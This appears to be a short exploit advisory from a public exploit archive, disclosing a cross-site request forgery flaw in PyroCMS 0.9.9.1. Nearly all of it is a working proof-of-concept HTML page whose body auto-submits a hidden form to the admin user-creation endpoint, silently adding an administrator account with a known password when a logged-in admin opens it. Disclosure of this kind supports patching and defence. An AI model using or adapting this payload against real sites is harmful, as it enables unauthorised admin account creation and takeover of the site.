PyroCMS 0.9.9.1 Cross Site Request Forgery

`<!------------------------------------------------------------------------  
# Software................PyroCMS 0.9.9.1  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://pyrocms.com/  
# Release Date............7/11/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be  
# exploited to create a new admin.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">  
<input type="hidden" name="first_name" value="a" />  
<input type="hidden" name="last_name" value="a" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="username" value="new_admin" />  
<input type="hidden" name="display_name" value="a" />  
<input type="hidden" name="group" value="admin" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="password" value="Password1" />  
<input type="hidden" name="confirm_password" value="Password1" />  
<input type="hidden" name="btnAction" value="save" />  
</form>  
</body>  
</html>  
`